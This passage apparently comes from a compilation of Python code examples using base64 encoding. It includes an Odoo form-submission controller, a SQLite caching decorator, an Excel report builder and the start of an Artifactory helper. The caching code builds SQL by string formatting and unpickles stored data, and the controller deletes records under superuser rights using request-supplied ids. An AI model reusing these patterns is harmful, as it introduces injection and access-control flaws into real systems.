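The PY2/PY3 branch above exists because encodestring returns bytes (with a trailing newline) on Python 3. Using b64encode avoids both the newline cleanup and the version check; a minimal sketch with illustrative credentials:

import base64

creds = "%s:%s" % ("user", "secret")   # illustrative credentials
authz = "Basic %s" % base64.b64encode(creds.encode("utf-8")).decode("ascii")
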
Example #31
    def offers_apply(self,
                     offer=None,
                     next_stage=None,
                     submission=None,
                     is_new=None,
                     **post):

        #If no user is connected, force login
        #TODO: Redirect to submission page if offer variable is in session
        if not request.session.uid:
            request.session.update({'offer': offer.id})
            return login_redirect()

        #Get the candidate, if no candidate create one
        sudo_env = request.env(user=SUPERUSER_ID)
        env = request.env()
        candidate = env.user

        #Get the submission, if no submission call creation template
        if not submission:
            if request.session.get('submission'):
                submission = candidate.submissions.filtered(
                    lambda s: s.id == int(request.session.get('submission')))
            if not submission or is_new == 'new':
                submission = env['project.submission'].create({
                    'name':
                    '/',
                    'offer':
                    offer.id,
                    'candidate':
                    candidate.id,
                })
        error = {}
        request.session.update({'submission': submission.id})
        #Save the current stage
        current_stage = post.get('current_stage') and int(
            post.get('current_stage'))
        try:
            if bool(post) and post.get('submit') != 'cancel':
                if post.get('unlink-doc'):
                    #TODO: call with adequate access rights. Sudo might be dangerous if the id passed is wrong
                    sudo_env['ir.attachment'].browse(
                        int(post.get('unlink-doc'))).unlink()
                if post.get('unlink-task'):
                    submission.tasks.filtered(lambda t: t.id == int(
                        post.get('unlink-task'))).unlink()
                if post.get('unlink-partner'):
                    submission.costs.filtered(lambda c: c.partner.id == int(
                        post.get('unlink-partner'))).unlink()
                    submission.write(
                        {'partners': [(3, int(post.get('unlink-partner')))]})
                    partner = sudo_env['res.partner'].browse(
                        int(post.get('unlink-partner')))
                    if not partner.submissions:
                        partner.unlink()
                if post.get('unlink-budgetline'):
                    env['project.submission.budgetline'].browse(
                        int(post.get('unlink-budgetline'))).unlink()
                #Stage 1: Project general information
                if current_stage == 1:
                    value = {
                        'name':
                        post.get('name'),
                        'acronyme':
                        post.get('acronyme'),
                        'duration':
                        post.get('duration'),
                        'field_ids': [(6, 0, [
                            int(x)
                            for x in request.httprequest.form.getlist('fields')
                        ])],
                        'keywords':
                        post.get('keywords'),
                        'description':
                        post.get('description'),
                        'n_related_publications':
                        post.get('n_related_publications'),
                        'trl':
                        post.get('trl'),
                        'n_ing_doc':
                        post.get('n_ing_doc'),
                        'n_master_pfe':
                        post.get('n_master_pfe'),
                    }
                    submission.write(value)
                #Stage 2: Candidate general information
                elif current_stage == 2:
                    value = {
                        'name': post.get('name'),
                        'function': post.get('function'),
                        'phone': post.get('phone'),
                        'mobile': post.get('mobile'),
                        'email': post.get('email'),
                    }
                    candidate.write(value)
                    if post.get('organisme'):
                        if candidate.parent_id:
                            candidate.parent_id.write(
                                {'name': post.get('organisme')})
                        else:
                            organisme = sudo_env['res.partner'].create(
                                {'name': post.get('organisme')})
                            candidate.write({'parent_id': organisme.id})
                    else:
                        if candidate.parent_id:
                            part = candidate.parent_id
                            candidate.parent_id = False
                            """try:
                                part.unlink()
                            except Exception:
                                pass"""
                    if post.get('inventor'):
                        inventor_value = {
                            'name': post.get('inventor'),
                            'phone': post.get('inventor_phone'),
                            'mobile': post.get('inventor_mobile'),
                            'email': post.get('inventor_email'),
                        }
                        if submission.inventor:
                            submission.inventor.write(inventor_value)
                        else:
                            inventor = sudo_env['res.partner'].create(
                                inventor_value)
                            submission.write({'inventor': inventor.id})
                    else:
                        if submission.inventor:
                            part = submission.inventor
                            submission.inventor = False
                            """try:
                                part.unlink()
                            except Exception:
                                pass"""
                    if post.get('ufile'):
                        for file in request.httprequest.files.getlist('ufile'):
                            attachment_value = {
                                'name': file.filename,
                                'res_name': value['name'],
                                'res_model': 'res.users',
                                'res_id': candidate.id,
                                'datas': base64.encodestring(file.read()),
                                'datas_fname': file.filename,
                            }
                            env['ir.attachment'].create(attachment_value)
                        candidate._get_attached_docs()

                #Stage 3: Project partner information
                elif (current_stage == 3 or current_stage == 4
                      ) and post.get('to-save') == "1" and post.get('name'):
                    #partner_organisme = env['res.partner'].create({'name': post.get('organisme')})
                    category_id = False
                    if post.get('category_id'):
                        category_id = env['res.partner.category'].search([
                            ('name', '=', post.get('category_id'))
                        ])
                        if not category_id:
                            category_id = env['res.partner.category'].create(
                                {'name': post.get('category_id')})
                    partner_value = {
                        'name':
                        post.get('name') and post.get('name'),
                        'country_id':
                        post.get('partner_country')
                        and post.get('partner_country'),
                        'is_company':
                        True,
                        'city':
                        post.get('city') and post.get('city'),
                        'zip':
                        post.get('zip') and post.get('zip'),
                        'street':
                        post.get('street') and post.get('street'),
                        'street2':
                        post.get('street2') and post.get('street2'),
                        'email':
                        post.get('email') and post.get('email'),
                        'phone':
                        post.get('phone') and post.get('phone'),
                        'fax':
                        post.get('fax') and post.get('fax'),
                        'website':
                        post.get('website') and post.get('website'),
                        'cnss':
                        post.get('cnss') and post.get('cnss'),
                        'ca':
                        post.get('ca') and post.get('ca'),
                        'capital':
                        post.get('capital') and post.get('capital'),
                        'partner_references':
                        post.get('partner_references')
                        and post.get('partner_references'),
                        'rc':
                        post.get('rc') and post.get('rc'),
                        'category_id':
                        category_id and [(6, 0, [category_id.id])],
                        'title':
                        post.get('title') and post.get('title'),
                        'date':
                        post.get('date') != '' and post.get('date'),
                        'effectif_doc':
                        post.get('effectif_doc') and post.get('effectif_doc'),
                        'effectif':
                        post.get('effectif') and post.get('effectif'),
                        'effectif_chercheur':
                        post.get('effectif_chercheur')
                        and post.get('effectif_chercheur'),
                        'entite_recherche':
                        post.get('entite_recherche')
                        and post.get('entite_recherche'),
                        #'parent_id': partner_organisme.id,
                        'category':
                        'scientifique' if current_stage == 3 else 'industriel',
                        'submissions': [(4, submission.id)]
                    }
                    if post.get('partner_id') is not None:
                        partner = sudo_env['res.partner'].browse(
                            int(post.get('partner_id')))
                        partner.write(partner_value)
                    else:
                        partner = sudo_env['res.partner'].create(partner_value)
                    contact_value = {
                        'name':
                        post.get('contact_name'),
                        'function':
                        post.get('contact_function'),
                        'phone':
                        post.get('contact_phone'),
                        'email':
                        post.get('contact_email'),
                        'parent_id':
                        partner.id,
                        'category':
                        'scientifique' if current_stage == 3 else 'industriel'
                    }
                    if partner.child_ids.ids:
                        partner.child_ids[0].write(contact_value)
                    else:
                        sudo_env['res.partner'].create(contact_value)
                    if post.get('ufile'):
                        for file in request.httprequest.files.getlist('ufile'):
                            attachment_value = {
                                'name': file.filename,
                                'res_name': partner.name,
                                'res_model': 'res.partner',
                                'res_id': partner.id,
                                'datas': base64.encodestring(file.read()),
                                'datas_fname': file.filename,
                            }
                            sudo_env['ir.attachment'].create(attachment_value)
                #Stage 4: Additional info
                elif current_stage == 5:
                    value = {
                        'etat_art':
                        post.get('etat_art'),
                        'objective':
                        post.get('objective'),
                        'objectives':
                        post.get('objectives'),
                        'fallout':
                        post.get('fallout'),
                        'perspective':
                        post.get('perspective'),
                        'produits_services_process':
                        post.get('produits_services_process'),
                        'analyse_macro':
                        post.get('analyse_macro'),
                        'analyse_marche':
                        post.get('analyse_marche'),
                        'cible':
                        post.get('cible'),
                        'analyse_competitive':
                        post.get('analyse_competitive'),
                        'proposition_valeur':
                        post.get('proposition_valeur'),
                        'business_model':
                        post.get('business_model'),
                        'invest_retour':
                        post.get('invest_retour'),
                        'plan':
                        post.get('plan'),
                    }
                    submission.write(value)
                    if post.get('ufile'):
                        for file in request.httprequest.files.getlist('ufile'):
                            attachment_value = {
                                'name': file.filename,
                                'res_name': submission.name,
                                'res_model': 'project.submission',
                                'res_id': submission.id,
                                'datas': base64.encodestring(file.read()),
                                'datas_fname': file.filename,
                            }
                            env['ir.attachment'].create(attachment_value)
                        submission._get_attached_docs()
                #Stage 5: Tasks
                elif current_stage == 6 and post.get(
                        'to-save') == "1" and post.get('name') and post.get(
                            'type'):
                    value = {
                        'name':
                        post.get('name'),
                        'type':
                        post.get('type'),
                        'semester':
                        post.get('semester'),
                        'objectives':
                        post.get('objectives'),
                        'description':
                        post.get('description'),
                        'partner':
                        post.get('partner'),
                        'submission':
                        submission.id,
                        'partners': [(6, 0, [
                            int(x) for x in request.httprequest.form.getlist(
                                'partners')
                        ])],
                    }
                    if post.get('task_id') is not None:
                        task = env['project.submission.task'].browse(
                            int(post.get('task_id')))
                        task.write(value)
                    else:
                        env['project.submission.task'].create(value)
                #Stage 6: Project budget information
                elif current_stage == 7:
                    for line in submission.budget_lines:
                        vals = {
                            'montant_propre':
                            post.get(str(line.id) + 'montant_propre') and
                            float(post.get(str(line.id) + 'montant_propre')),
                            'montant_subventionne':
                            post.get(str(line.id) + 'montant_subventionne')
                            and float(
                                post.get(
                                    str(line.id) + 'montant_subventionne'))
                        }
                        line.write(vals)
                    for line in submission.personnels:
                        vals = {
                            'time':
                            post.get(str(line.id) + 'time')
                            and int(post.get(str(line.id) + 'time')),
                            'number':
                            post.get(str(line.id) + 'number')
                            and float(post.get(str(line.id) + 'number')),
                            'montant_propre':
                            post.get(
                                str(line.id) + 'montant_propre_personnel')
                            and float(
                                post.get(
                                    str(line.id) +
                                    'montant_propre_personnel')),
                            'montant_demande':
                            post.get(
                                str(line.id) + 'montant_demande_personnel')
                            and float(
                                post.get(
                                    str(line.id) +
                                    'montant_demande_personnel'))
                        }
                        line.write(vals)
                    for line in submission.costs:
                        vals = {
                            'montant':
                            post.get(str(line.id) + 'montant_cout')
                            and float(post.get(str(line.id) + 'montant_cout'))
                        }
                        line.write(vals)

                elif current_stage == 8:

                    if post.get('ufile'):
                        attachment_value = {
                            'name':
                            str(time.time()) + '_' + post['ufile'].filename,
                            'res_name':
                            submission.name,
                            'res_model':
                            'project.submission',
                            'res_id':
                            submission.id,
                            'datas':
                            base64.encodestring(post['ufile'].read()),
                            'datas_fname':
                            post['ufile'].filename,
                            'parent_id':
                            sudo_env['document.directory'].search([
                                ('name', '=', 'Conventions')
                            ]) and sudo_env['document.directory'].search(
                                [('name', '=', 'Conventions')]).ids[0]
                        }
                        sudo_env['ir.attachment'].create(attachment_value)
                    if post.get('submit') == 'confirm':
                        submission.state = 'submitted'
        except ValidationError, e:
            next_stage = current_stage
            if post.get('partner_id'):
                post.update({'edit-partner': post.get('partner_id')})
            if post.get('task_id'):
                post.update({'edit-task': post.get('task_id')})
            if post.get('budgetline_id'):
                post.update({'edit-budgetline': post.get('budgetline_id')})
            env.cr.rollback()
            env.invalidate_all()
            error.update({'main': e.value})
Example #32
        def wrapper(*args, **kwargs):
            is_cashed = None
            is_cropped = None
            conn = sqlite3.connect(DB_NAME)
            c = conn.cursor()

            PICKLE_ARGS = base64.encodestring(
                pickle.dumps(args[1:], pickle.HIGHEST_PROTOCOL))
            PICKLE_KWARGS = base64.encodestring(
                pickle.dumps(kwargs, pickle.HIGHEST_PROTOCOL))

            SQL_SELECT = "SELECT * FROM  %s WHERE func_name='%s' AND func_args='%s' AND func_kwargs ='%s'" % (
                DB_TABLE, func.__name__, PICKLE_ARGS, PICKLE_KWARGS)

            SQL_DELETE = "DELETE FROM  %s WHERE func_name='%s' AND func_args='%s' AND func_kwargs ='%s'" % (
                DB_TABLE, func.__name__, PICKLE_ARGS, PICKLE_KWARGS)

            SQL_COUNT = "SELECT count(*) FROM  %s WHERE func_name='%s'" % (
                DB_TABLE, func.__name__)
            SQL_CROP = "DELETE FROM  %s WHERE func_name='%s' AND cashed_date=(SELECT min(cashed_date) FROM '%s')" % (
                DB_TABLE, func.__name__, DB_TABLE)
            SQL_CROP_TTL = "DELETE FROM  %s WHERE func_name='%s' AND cashed_date<'%s'" % (
                DB_TABLE, func.__name__, datetime.now() - data_ttl)

            dt = datetime.now()

            def SQL_INSERT(arg):
                PIKLE_RES = base64.encodestring(
                    pickle.dumps(arg, pickle.HIGHEST_PROTOCOL))
                return "INSERT INTO  %s (func_name, func_args, func_kwargs, cashed_result, cashed_date) VALUES ('%s','%s', '%s', '%s','%s')" % (
                    DB_TABLE, func.__name__, PICKLE_ARGS, PICKLE_KWARGS,
                    PIKLE_RES, dt)

            def UNPIKLE(arg):
                try:
                    return pickle.loads(base64.decodestring(arg))
                except:
                    return None

            # purge all cached items whose TTL has expired
            c.execute(SQL_CROP_TTL)

            fetched_row = c.execute(SQL_SELECT).fetchone()
            if fetched_row:
                # return cached values
                output = UNPIKLE(fetched_row[3])
                is_cashed = "CASHED"
            else:
                # not cached yet: compute and store the result
                if c.execute(SQL_COUNT).fetchone()[0] >= DB_MAX_ITEMS:
                    # if there is no more room, evict the oldest cached item
                    is_cropped = "ITEMS IS CROPPED"
                    c.execute(SQL_CROP)

                output = func(*args, **kwargs)
                c.execute(SQL_DELETE)
                c.execute(SQL_INSERT(output))
                is_cashed = "NON CASHED"

            #================================================================================

            conn.commit()
            c.close()
            if debug:
                return output, is_cashed, is_cropped
            else:
                return output
Example #33
    def button_excel(self, data, context=None):
        fillGRINDING = PatternFill(start_color='FFFF0000', end_color='FFFF0000', fill_type='solid')
        fillGOUGING = PatternFill(start_color='FFFF0000', end_color='FFFF0000', fill_type='solid')
        fillWELDING = PatternFill(start_color='FFFF0000', end_color='FFFF0000', fill_type='solid')
        commGRINDING = [None] * 200
        commGOUGING = [None] * 200
        commWELDING = [None] * 200
        src = path.dirname(path.realpath(__file__)) + "/FinishFetplan.xlsx"
        wb = openpyxl.load_workbook(src)
        wb.active = 0
        worksheet = wb.active
        filename = 'FinishFetplan.xlsx'
        reportname = "FinishFetPlan:"
        self.name = 'Finish Fet Plan Report as on: ' + str(self.from_dt)

        # Start of Section to generate load portion of sheet
        wb.active = 0
        worksheet = wb.active
        itemheader_obj = self.env['finishfetplanmodule.manpowertable']
        item_ids = itemheader_obj.search([(1, '=', 1)])
        for thisitem in item_ids:
            if thisitem.jobrouting_id.name == 'WELDING':
                welding_shift_a = thisitem.shift_a
                welding_shift_b = thisitem.shift_b
                welding_shift_c = thisitem.shift_c
            if thisitem.jobrouting_id.name == 'GRINDING':
                grinding_shift_a = thisitem.shift_a
                grinding_shift_b = thisitem.shift_b
                grinding_shift_c = thisitem.shift_c
            if thisitem.jobrouting_id.name == 'Gouging':
                gouging_shift_a = thisitem.shift_a
                gouging_shift_b = thisitem.shift_b
                gouging_shift_c = thisitem.shift_c

        itemheader_obj = self.env['finishfetplanmodule.itemplantable']
        item_ids = itemheader_obj.search(['&', ('date', '>=', self.from_dt), ('items_status', '=', False)])

        for thisitem in item_ids:
            if thisitem.date >= self.from_dt:
                datediff = (thisitem.date - self.from_dt)
                col = ((datediff.days + 1) * 3) + 1
                dateStr = str(thisitem.date.day) + "/" + str(thisitem.date.month)
                setdate = worksheet.cell(row=11, column=col)
                setdate.value = dateStr
                if thisitem.jobrouting_id.name == 'WELDING':
                    row = 14
                    if thisitem.shift_a > 0:
                        setcol = worksheet.cell(row=row - 1, column=col)
                        setcol.value = welding_shift_a
                        setcol2 = worksheet.cell(row=row, column=col)
                        if setcol2.value:
                            setcol2.value = setcol2.value + thisitem.shift_a or ''
                            # Setting value of comment if WELDER is Overloaded in Shift A
                            if welding_shift_a < setcol2.value:
                                commWELDING[col] = Comment(
                                    'Overloaded: Out of ' + str(welding_shift_a) + ' WELDER in Shift A loaded ' + str(
                                        setcol2.value), 'System')
                            # END of : Setting value of comment if WELDER is Overloaded in Shift A
                        else:
                            setcol2.value = thisitem.shift_a or ''
                    col = col + 1

                    if thisitem.shift_b > 0:
                        setcol = worksheet.cell(row=row - 1, column=col)
                        setcol.value = welding_shift_b
                        setcol3 = worksheet.cell(row=row, column=col)
                        if setcol3.value:
                            setcol3.value = setcol3.value + thisitem.shift_b or ''
                            # Setting value of comment if WELDER is Overloaded in Shift B
                            if welding_shift_b < setcol3.value:
                                commWELDING[col] = Comment(
                                    'Overloaded: Out of ' + str(welding_shift_b) + ' WELDER in Shift B loaded ' + str(
                                        setcol3.value), 'System')
                            # END of : Setting value of comment if WELDER is Overloaded in Shift B

                        else:
                            setcol3.value = thisitem.shift_b or ''
                    col = col + 1

                    if thisitem.shift_c > 0:
                        setcol = worksheet.cell(row=row - 1, column=col)
                        setcol.value = welding_shift_c
                        setcol4 = worksheet.cell(row=row, column=col)
                        if setcol4.value:
                            setcol4.value = setcol4.value + thisitem.shift_c
                            # Setting value of comment if WELDER is Overloaded in Shift C
                            if welding_shift_c < setcol4.value:
                                commWELDING[col] = Comment(
                                    'Overloaded: Out of ' + str(welding_shift_c) + ' WELDER in Shift C loaded ' + str(
                                        setcol4.value), 'System')
                            # END of : Setting value of comment if WELDER is Overloaded in Shift C

                        else:
                            setcol4.value = thisitem.shift_c

                if thisitem.jobrouting_id.name == 'GRINDING':
                    row = 17
                    if thisitem.shift_a > 0:
                        setcol = worksheet.cell(row=row - 1, column=col)
                        setcol.value = grinding_shift_a
                        setcol2 = worksheet.cell(row=row, column=col)
                        if setcol2.value:
                            setcol2.value = setcol2.value + thisitem.shift_a or ''
                            # Setting value of comment if GRINDING is Overloaded in Shift A
                            if grinding_shift_a < setcol2.value:
                                commGRINDING[col] = Comment(
                                    'Overloaded: Out of ' + str(
                                        grinding_shift_a) + ' GRINDING in Shift A loaded ' + str(
                                        setcol2.value), 'System')
                            # END of : Setting value of comment if GRINDING is Overloaded in Shift A
                        else:
                            setcol2.value = thisitem.shift_a or ''
                    col = col + 1

                    if thisitem.shift_b > 0:
                        setcol = worksheet.cell(row=row - 1, column=col)
                        setcol.value = grinding_shift_b
                        setcol3 = worksheet.cell(row=row, column=col)
                        if setcol3.value:
                            setcol3.value = setcol3.value + thisitem.shift_b or ''
                            # Setting value of comment if GRINDING is Overloaded in Shift B
                            if grinding_shift_b < setcol3.value:
                                commGRINDING[col] = Comment(
                                    'Overloaded: Out of ' + str(
                                        grinding_shift_b) + ' GRINDING in Shift B loaded ' + str(
                                        setcol3.value), 'System')
                            # END of : Setting value of comment if GRINDING is Overloaded in Shift B
                        else:
                            setcol3.value = thisitem.shift_b or ''
                    col = col + 1

                    if thisitem.shift_c > 0:
                        setcol = worksheet.cell(row=row - 1, column=col)
                        setcol.value = grinding_shift_c
                        setcol4 = worksheet.cell(row=row, column=col)
                        if setcol4.value:
                            setcol4.value = setcol4.value + thisitem.shift_c
                            # Setting value of comment if GRINDING is Overloaded in Shift C
                            if grinding_shift_c < setcol4.value:
                                commGRINDING[col] = Comment(
                                    'Overloaded: Out of ' + str(
                                        grinding_shift_c) + ' GRINDING in Shift C loaded ' + str(
                                        setcol4.value), 'System')
                            # END of : Setting value of comment if GRINDING is Overloaded in Shift C

                        else:
                            setcol4.value = thisitem.shift_c

                if thisitem.jobrouting_id.name == 'Gouging':
                    row = 20
                    if thisitem.shift_a > 0:
                        setcol = worksheet.cell(row=row - 1, column=col)
                        setcol.value = gouging_shift_a
                        setcol2 = worksheet.cell(row=row, column=col)
                        if setcol2.value:
                            setcol2.value = setcol2.value + thisitem.shift_a or ''
                            # Setting value of comment if Gouging is Overloaded in Shift A
                            if gouging_shift_a < setcol2.value:
                                commGOUGING[col] = Comment(
                                    'Overloaded: Out of ' + str(
                                        gouging_shift_a) + ' Gouging in Shift A loaded ' + str(
                                        setcol2.value), 'System')
                            # END of : Setting value of comment if Gouging is Overloaded in Shift A
                        else:
                            setcol2.value = thisitem.shift_a or ''
                    col = col + 1

                    if thisitem.shift_b > 0:
                        setcol = worksheet.cell(row=row - 1, column=col)
                        setcol.value = gouging_shift_b
                        setcol3 = worksheet.cell(row=row, column=col)
                        if setcol3.value:
                            setcol3.value = setcol3.value + thisitem.shift_b or ''
                            # Setting value of comment if Gouging is Overloaded in Shift B
                            if gouging_shift_b < setcol3.value:
                                commGOUGING[col] = Comment(
                                    'Overloaded: Out of ' + str(
                                        gouging_shift_b) + ' Gouging in Shift B loaded ' + str(
                                        setcol3.value), 'System')
                            # END of : Setting value of comment if Gouging is Overloaded in Shift B
                        else:
                            setcol3.value = thisitem.shift_b or ''
                    col = col + 1

                    if thisitem.shift_c > 0:
                        setcol = worksheet.cell(row=row - 1, column=col)
                        setcol.value = gouging_shift_c
                        setcol4 = worksheet.cell(row=row, column=col)
                        if setcol4.value:
                            setcol4.value = setcol4.value + thisitem.shift_c
                            # Setting value of comment if Gouging is Overloaded in Shift C
                            if gouging_shift_c < setcol4.value:
                                commGOUGING[col] = Comment(
                                    'Overloaded: Out of ' + str(
                                        gouging_shift_c) + ' Gouging in Shift C loaded ' + str(
                                        setcol4.value), 'System')
                            # END of : Setting value of comment if Gouging is Overloaded in Shift C
                        else:
                            setcol4.value = thisitem.shift_c

        # End of Generation of Load portion of sheet
        # Start of Section to Generate Plan portion of the sheet
        itemheader_obj = self.env['finishfetplanmodule.itemplanheadertable']
        itemheader_ids = itemheader_obj.search(['&', ('plan_date', '>=', self.from_dt), ('item_status', '!=', True)])
        row = 26
        for thisitems_id in itemheader_ids:
            setcol1 = worksheet.cell(row=row, column=1)
            setcol1.value = thisitems_id.name or ''
            setcol1 = worksheet.cell(row=row, column=2)
            setcol1.value = thisitems_id.wo_srno or ''

            for thisitem in thisitems_id.itemplan_id:
                if thisitem.date >= self.from_dt:
                    datediff = (thisitem.date - self.from_dt)
                    col = ((datediff.days + 1) * 3) + 1
                    dateStr = str(thisitem.date.day) + "/" + str(thisitem.date.month)
                    setdate = worksheet.cell(row=24, column=col)
                    setdate.value = dateStr
                    # # Commenting out the text-read portion as it takes too long
                    # # for the string value of Shift A
                    # if thisitem.shift_a_c != '':
                    #     setcol2 = worksheet.cell(row=row, column=col)
                    #     setcol2.value = thisitem.shift_a_c or ''
                    #     if str(thisitem.bg_color_cell)[0:2] == 'FF':
                    #         colorfill = PatternFill(start_color=thisitem.bg_color_cell,
                    #                                 end_color=thisitem.bg_color_cell, fill_type='solid')
                    #         setcol2.fill = colorfill

                    # for  Decimal or Number  Value Shift A
                    if thisitem.shift_a > 0 and thisitem.jobrouting_id:
                        setcol2 = worksheet.cell(row=row, column=col)
                        setcol2.value = thisitem.shift_a
                        colorfill = PatternFill(start_color=thisitem.jobrouting_id.colour,
                                                end_color=thisitem.jobrouting_id.colour, fill_type='solid')
                        setcol2.fill = colorfill
                        # Setting value of comment if WELDER is Overloaded in Shift A
                        if thisitem.jobrouting_id.name == 'WELDING':
                            if commWELDING[col]:
                                setcol2.comment = commWELDING[col]
                        # END of Setting value of comment if WELDER is Overloaded in Shift A

                        # Setting value of comment if GRINDING is Overloaded in Shift A
                        if thisitem.jobrouting_id.name == 'GRINDING':
                            if commGRINDING[col]:
                                setcol2.comment = commGRINDING[col]
                        # END of Setting value of comment if GRINDING is Overloaded in Shift A

                        # Setting value of comment if Gouging is Overloaded in Shift A
                        if thisitem.jobrouting_id.name == 'Gouging':
                            if commGOUGING[col]:
                                setcol2.comment = commGOUGING[col]
                        # END of Setting value of comment if Gouging is Overloaded in Shift A

                    col = col + 1
                    # # Commenting out the text-read portion as it takes too long
                    # # for the string value of Shift B
                    # if thisitem.shift_b_c != '':
                    #     setcol3 = worksheet.cell(row=row, column=col)
                    #     setcol3.value = thisitem.shift_b_c or ''
                    #
                    #     if str(thisitem.bg_color_cell)[0:2] == 'FF':
                    #         colorfill = PatternFill(start_color=thisitem.bg_color_cell,
                    #                                 end_color=thisitem.bg_color_cell, fill_type='solid')
                    #         setcol3.fill = colorfill
                    # for  Decimal or Number  Value Shift B
                    if thisitem.shift_b > 0 and thisitem.jobrouting_id:
                        setcol3 = worksheet.cell(row=row, column=col)
                        setcol3.value = thisitem.shift_b
                        colorfill = PatternFill(start_color=thisitem.jobrouting_id.colour,
                                                end_color=thisitem.jobrouting_id.colour, fill_type='solid')
                        setcol3.fill = colorfill
                        # Setting value of comment if WELDER is Overloaded in Shift B
                        if thisitem.jobrouting_id.name == 'WELDING':
                            if commWELDING[col]:
                                setcol3.comment = commWELDING[col]
                        # END of Setting value of comment if WELDER is Overloaded in Shift B

                        # Setting value of comment if GRINDING is Overloaded in Shift B
                        if thisitem.jobrouting_id.name == 'GRINDING':
                            if commGRINDING[col]:
                                setcol3.comment = commGRINDING[col]
                        # END of Setting value of comment if GRINDING is Overloaded in Shift B

                        # Setting value of comment if Gouging is Overloaded in Shift B
                        if thisitem.jobrouting_id.name == 'Gouging':
                            if commGOUGING[col]:
                                setcol3.comment = commGOUGING[col]
                        # END of Setting value of comment if Gouging is Overloaded in Shift B

                    col = col + 1
                    # # Commenting out the text-read portion as it takes too long
                    # # for the string value of Shift C
                    # if thisitem.shift_c_c != '':
                    #     setcol4 = worksheet.cell(row=row, column=col)
                    #     setcol4.value = thisitem.shift_c_c or ''
                    #     if str(thisitem.bg_color_cell)[0:2] == 'FF':
                    #         colorfill = PatternFill(start_color=thisitem.bg_color_cell,
                    #                                 end_color=thisitem.bg_color_cell, fill_type='solid')
                    #         setcol4.fill = colorfill

                    # for  Decimal or Number  Value Shift C
                    if thisitem.shift_c > 0 and thisitem.jobrouting_id:
                        setcol4 = worksheet.cell(row=row, column=col)
                        setcol4.value = thisitem.shift_c
                        colorfill = PatternFill(start_color=thisitem.jobrouting_id.colour,
                                                end_color=thisitem.jobrouting_id.colour, fill_type='solid')
                        setcol4.fill = colorfill
                        # Setting value of comment if WELDER is Overloaded in Shift C
                        if thisitem.jobrouting_id.name == 'WELDING':
                            if commWELDING[col]:
                                setcol4.comment = commWELDING[col]
                        # END of Setting value of comment if WELDER is Overloaded in Shift C

                        # Setting value of comment if GRINDING is Overloaded in Shift C
                        if thisitem.jobrouting_id.name == 'GRINDING':
                            if commGRINDING[col]:
                                setcol4.comment = commGRINDING[col]
                        # END of Setting value of comment if GRINDING is Overloaded in Shift C

                        # Setting value of comment if Gouging is Overloaded in Shift C
                        if thisitem.jobrouting_id.name == 'Gouging':
                            if commGOUGING[col]:
                                setcol4.comment = commGOUGING[col]
                        # END of Setting value of comment if Gouging is Overloaded in Shift C

            row = row + 2
        # End of Section to generate Plan portion of the sheet

        # Start of Generation of Actual portion of sheet
        wb.active = 0
        worksheet = wb.active
        # Generating Actual Portion

        itemheader_obj = self.env['finishfetplanmodule.itemplanheadertable']
        itemheader_ids = itemheader_obj.search(['&', ('plan_date', '>=', self.from_dt), ('item_status', '!=', True)])
        row = 27
        for thisitems_id in itemheader_ids:
            # These are already set while writing the Plan portion. Row 15 is merged with Row 14, so writing is not possible
            # setcol1 = worksheet.cell(row=row, column=1)
            # setcol1.value = thisitems_id.name or ''
            # setcol1 = worksheet.cell(row=row, column=2)
            # setcol1.value = thisitems_id.wo_srno or ''

            for thisitem in thisitems_id.actualitemplan_id:
                if thisitem.date >= self.from_dt:
                    datediff = (thisitem.date - self.from_dt)
                    col = ((datediff.days + 1) * 3) + 1
                    dateStr = str(thisitem.date.day) + "/" + str(thisitem.date.month)
                    setdate = worksheet.cell(row=24, column=col)
                    setdate.value = dateStr

                    # # Commenting out the text-read portion as it takes too long
                    # # for the string value of Shift A
                    # if thisitem.shift_a_c != '':
                    #     setcol2 = worksheet.cell(row=row, column=col)
                    #     setcol2.value = thisitem.shift_a_c or ''
                    # # for  Decimal or Number  Value Shift A
                    #
                    if thisitem.shift_a > 0:
                        setcol2 = worksheet.cell(row=row, column=col)
                        setcol2.value = thisitem.shift_a or ''
                        colorfill = PatternFill(start_color=thisitem.jobrouting_id.colour,
                                                end_color=thisitem.jobrouting_id.colour, fill_type='solid')

                        setcol2.fill = colorfill
                    col = col + 1
                    # # Commenting out the text-read portion as it takes too long
                    # # for the string value of Shift B
                    # if thisitem.shift_b_c != '':
                    #     setcol3 = worksheet.cell(row=row, column=col)
                    #     setcol3.value = thisitem.shift_b_c or ''
                    #
                    # for  Decimal or Number  Value Shift B
                    if thisitem.shift_b > 0:
                        setcol3 = worksheet.cell(row=row, column=col)
                        setcol3.value = thisitem.shift_b or ''
                        colorfill = PatternFill(start_color=thisitem.jobrouting_id.colour,
                                                end_color=thisitem.jobrouting_id.colour, fill_type='solid')

                        setcol3.fill = colorfill
                    col = col + 1
                    # # Commenting out the text-read portion as it takes too long
                    # # for the string value of Shift C
                    # if thisitem.shift_c_c != '':
                    #     setcol4 = worksheet.cell(row=row, column=col)
                    #     setcol4.value = thisitem.shift_c_c or ''
                    #
                    # for  Decimal or Number  Value Shift C
                    if thisitem.shift_c > 0:
                        setcol4 = worksheet.cell(row=row, column=col)
                        setcol4.value = thisitem.shift_c
                        colorfill = PatternFill(start_color=thisitem.jobrouting_id.colour,
                                                end_color=thisitem.jobrouting_id.colour, fill_type='solid')

                        setcol4.fill = colorfill
            row = row + 2
        wb.active = 0
        worksheet = wb.active
        fp = io.BytesIO()
        wb.save(fp)
        out = base64.encodestring(fp.getvalue())
        self.download_file = out
        self.report_flag = 1
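The last few lines above store the workbook as a base64 string on the record; a small round-trip sketch (the output path is an assumption, not taken from the module) shows how that field could be decoded back into an .xlsx file, Python 2 style to match the snippet:

import base64
import io
import openpyxl

# build and encode a workbook the same way button_excel does ...
wb = openpyxl.Workbook()
buf = io.BytesIO()
wb.save(buf)
encoded = base64.encodestring(buf.getvalue())

# ... then decode it again, which is what a consumer of download_file would do
with open('/tmp/FinishFetplan_export.xlsx', 'wb') as fh:
    fh.write(base64.decodestring(encoded))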
Example #34
def get_latest_snapshot(artifactory_url,
                        repository,
                        group_id,
                        artifact_id,
                        packaging,
                        target_dir='/tmp',
                        target_file=None,
                        classifier=None,
                        username=None,
                        password=None):
    '''
       Gets latest snapshot of the given artifact

       artifactory_url
           URL of artifactory instance
       repository
           Snapshot repository in artifactory to retrieve artifact from, for example: libs-snapshots
       group_id
           Group Id of the artifact
       artifact_id
           Artifact Id of the artifact
       packaging
           Packaging type (jar,war,ear,etc)
       target_dir
           Target directory to download artifact to (default: /tmp)
       target_file
           Target file to download artifact to (by default it is target_dir/artifact_id-snapshot_version.packaging)
       classifier
           Artifact classifier name (ex: sources,javadoc,etc). Optional parameter.
       username
